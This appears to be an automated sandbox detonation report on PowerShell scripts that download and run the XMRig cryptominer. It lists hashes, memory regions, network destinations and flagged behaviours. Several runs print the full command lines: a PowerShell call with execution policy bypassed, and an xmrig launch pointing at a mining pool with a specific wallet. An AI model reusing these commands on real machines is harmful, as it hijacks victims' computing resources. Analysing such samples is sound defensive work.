memory/4676-62-0x0000023BFAF80000-0x0000023BFAF8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4544-91-0x0000028650CF0000-0x0000028650D10000-memory.dmp

memory/4544-92-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-93-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4676-94-0x00007FFFC2E03000-0x00007FFFC2E04000-memory.dmp

memory/4676-95-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4676-96-0x00007FFFC2E00000-0x00007FFFC37EC000-memory.dmp

memory/4544-97-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-98-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-99-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-100-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-101-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-102-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-103-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-104-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-105-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-106-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-107-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-108-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-109-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-110-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-111-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-112-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-113-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-114-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-115-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-116-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-117-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-118-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-119-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-120-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-121-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-122-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-123-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-124-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-125-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-126-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-127-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-128-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-129-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-130-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-131-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-132-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-133-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-134-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-135-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-136-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-137-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-138-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-139-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-140-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-141-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-142-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-143-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-144-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-145-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-146-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-147-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-148-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-149-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-150-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-151-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-152-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-153-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-154-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-155-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-156-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

memory/4544-157-0x00007FF62E020000-0x00007FF62EC53000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 03:40

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp

Files

memory/4192-3-0x00007FFB5D423000-0x00007FFB5D424000-memory.dmp

memory/4192-5-0x0000028F7F4E0000-0x0000028F7F502000-memory.dmp

memory/4192-7-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp

memory/4192-9-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp

memory/4192-10-0x0000028F7FB40000-0x0000028F7FBB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zdfy5fgg.ojr.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4192-25-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp

memory/4192-48-0x0000028F18020000-0x0000028F18032000-memory.dmp

memory/4192-61-0x0000028F18010000-0x0000028F1801A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4268-90-0x000001BE70EE0000-0x000001BE70F00000-memory.dmp

memory/4268-91-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4192-93-0x00007FFB5D423000-0x00007FFB5D424000-memory.dmp

memory/4268-92-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4192-94-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp

memory/4192-95-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp

memory/4268-96-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-97-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-98-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-99-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-100-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-101-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-102-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-103-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-104-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-105-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-106-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-107-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-108-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-109-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-110-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-111-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-112-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-113-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-114-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-115-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-116-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-117-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-118-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-119-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-120-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-121-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-122-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-123-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-124-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-125-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-126-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-127-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-128-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-129-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-130-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-131-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-132-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-133-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-134-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-135-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-136-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-137-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-138-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-139-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-140-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-141-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-142-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-143-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-144-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-145-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-146-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-147-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-148-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-149-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-150-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-151-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-152-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-153-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-154-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-155-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-156-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:40

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4404-4-0x00007FFC1AAA3000-0x00007FFC1AAA4000-memory.dmp

memory/4404-5-0x0000027B5F8A0000-0x0000027B5F8C2000-memory.dmp

memory/4404-8-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp

memory/4404-9-0x0000027B5FBA0000-0x0000027B5FC16000-memory.dmp

memory/4404-10-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b5wuberz.kox.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4404-25-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp

memory/4404-48-0x0000027B5FB80000-0x0000027B5FB92000-memory.dmp

memory/4404-61-0x0000027B5FB70000-0x0000027B5FB7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/752-90-0x000001BD835E0000-0x000001BD83600000-memory.dmp

memory/752-91-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-92-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/4404-93-0x00007FFC1AAA3000-0x00007FFC1AAA4000-memory.dmp

memory/4404-94-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp

memory/4404-95-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp

memory/752-96-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-97-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-98-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-99-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-100-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-101-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-102-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-103-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-104-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-105-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-106-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-107-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-108-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-109-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-110-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-111-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-112-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-113-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-114-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-115-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-116-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-117-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-118-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-119-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-120-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-121-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-122-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-123-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-124-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-125-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-126-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-127-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-128-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-129-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-130-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-131-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-132-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-133-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-134-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-135-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-136-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-137-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-138-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-139-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-140-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-141-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-142-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-143-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-144-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-145-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-146-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-147-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-148-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-149-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-150-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-151-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-152-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-153-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-154-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-155-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-156-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:50

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1790s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
